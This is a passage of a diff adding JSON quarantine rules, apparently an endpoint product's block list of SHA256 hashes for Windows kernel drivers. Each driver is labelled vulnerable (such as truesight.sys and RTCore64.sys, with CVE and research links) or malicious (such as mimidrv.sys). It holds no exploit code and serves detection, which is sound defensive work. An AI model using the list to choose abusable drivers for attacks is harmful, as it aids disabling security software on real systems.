+ "comment": "Vulnerable ITM SYSTEM File Filter Driver (aka probmon.sys) [https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9e36ec0-fabf-5571-a2f8-f6977827bb46",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824661Z",
+ "creation_date": "2026-03-23T11:45:30.824664Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb1db36d8465baecf79e37e992f7552749503b942c76c4138cb39e0f86e5fbff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9e740d1-0681-5f4e-b576-0a6297a7ebdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815993Z",
+ "creation_date": "2026-03-23T11:45:30.815995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816001Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "270547552060c6f4f5b2ebd57a636d5e71d5f8a9d4305c2b0fe5db0aa2f389cc",
+ "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9e85c60-cf67-5de8-89a7-08b835fc6a12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477849Z",
+ "creation_date": "2026-03-23T11:45:30.477853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad5418a4b5edf1c963da343b1bdba14fac9e8ee49489b2f35136c4aebc9540b8",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9f10145-f570-5291-9210-5774fc338d5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828962Z",
+ "creation_date": "2026-03-23T11:45:31.828965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11cc3b62ab1db95187a0d65c321b6514f53757b50a46be0a0d9dc13d98d58d01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba068929-f5c9-5951-965d-e0b1586784d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809263Z",
+ "creation_date": "2026-03-23T11:45:31.809266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "534915d8e06cf020f0bfa567c425fa206a3d0c175d10a6f039e4da2eb37740cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba0d2233-4af7-5069-a3e0-9a0874a50878",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821393Z",
+ "creation_date": "2026-03-23T11:45:31.821395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa755a932255ccdc3e40f3d9db14c8c53dd15ec43f678e88262a3a6d29be0865",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba118ba8-3db7-5b85-8788-97e7291f64fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818941Z",
+ "creation_date": "2026-03-23T11:45:30.818943Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3577eeb107de6a0cdf6ac3ee75339f09fd0eb00b4d368bf841b6126af7629a1",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba1da611-e3fa-5321-9875-b634c4b8c736",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826747Z",
+ "creation_date": "2026-03-23T11:45:31.826749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b306a86b99f6e6273e920e5ee29a0f1eb2aa54074af3369b0c3fef86452694a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba21f595-85d5-55fc-9a21-abf3b7c737e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822945Z",
+ "creation_date": "2026-03-23T11:45:31.822956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822964Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a6f2532148a28855b741f3246162f58b940c8b4c3f7a218abcd029c624595e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba28b337-ca8f-5d88-84d4-b24409b7e2e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818381Z",
+ "creation_date": "2026-03-23T11:45:31.818384Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b1a3223f2a0e5468ee5ea9250747abb91ad144e529d12298ed406498e2b6949",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba28b817-6ea9-511a-a026-114097d1c7ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475314Z",
+ "creation_date": "2026-03-23T11:45:31.475318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7eb0e8be6426ef7337546df5dac9ec682ac3ecfe75739a777fe79a677d935783",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba4950e5-1616-5b71-befb-9b57f8e647b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607311Z",
+ "creation_date": "2026-03-23T11:45:29.607313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a10b4ed33a13c08804da8b46fd1b7bd653a6f2bb65668e82086de1940c5bb5d1",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba4f15ac-920c-524e-b30d-4de6ff7c57ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982289Z",
+ "creation_date": "2026-03-23T11:45:29.982291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4",
+ "comment": "Vulnerable Kernel Driver (aka SSPORT.sys) [https://www.loldrivers.io/drivers/c854b612-0b9f-4fc3-a7b8-a93bed7a291e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba510417-661d-50bf-827d-c10ffa880ee2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821503Z",
+ "creation_date": "2026-03-23T11:45:31.821505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83b05582efd8cc9bc6ecf5d93e4f86ea8c3e6aeca5bd1d77baa2954924493cb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba5795e9-dddf-5fe9-bcab-66536ffb8f15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474062Z",
+ "creation_date": "2026-03-23T11:45:30.474065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dadbd564c4fec1cb6a3e2be92031f22b1ddd19796d5d9639bffb927599c69a8d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba5caa18-d697-58fe-807a-38def385a2e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985814Z",
+ "creation_date": "2026-03-23T11:45:29.985816Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a",
+ "comment": "Malicious Kernel Driver (aka NQrmq.sys) [https://www.virustotal.com/gui/file/ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba5ee5c0-6a3f-55cb-81ce-3728252362d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614718Z",
+ "creation_date": "2026-03-23T11:45:29.614720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba5f1ea8-cd37-5d52-9788-48abb875c686",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148660Z",
+ "creation_date": "2026-03-23T11:45:31.148661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "356851d609ce4becafec5ea6fd7548d25d6cc9e711d03d2d6a6513a30480a0ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba6007ff-6a13-5571-b09a-d572966b0cc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483891Z",
+ "creation_date": "2026-03-23T11:45:31.483895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e9f19cb357291cc073b6396ec5cea5093daa2d47332b44fed69d9b904c21dc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba734b3c-b826-5902-abc9-344346ee150a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478125Z",
+ "creation_date": "2026-03-23T11:45:31.478129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b6cc38c48e21cbb8320efaa3720e61521c35f9b1e2d6e28c081f1a9eff4bff3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba80a52f-815a-5fb3-8806-3467e244e7d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470371Z",
+ "creation_date": "2026-03-23T11:45:30.470375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470383Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c9f431814cd58365468ac63ba8b6693c3dd2a2b3ef37b23e5d80d75083b784d",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba82a4e1-36f8-5911-b96a-7c6eda84401d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821429Z",
+ "creation_date": "2026-03-23T11:45:31.821431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8542409e3eed1df27f43d714d6b6851bb56627d089c173e331c81527f0c2de0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
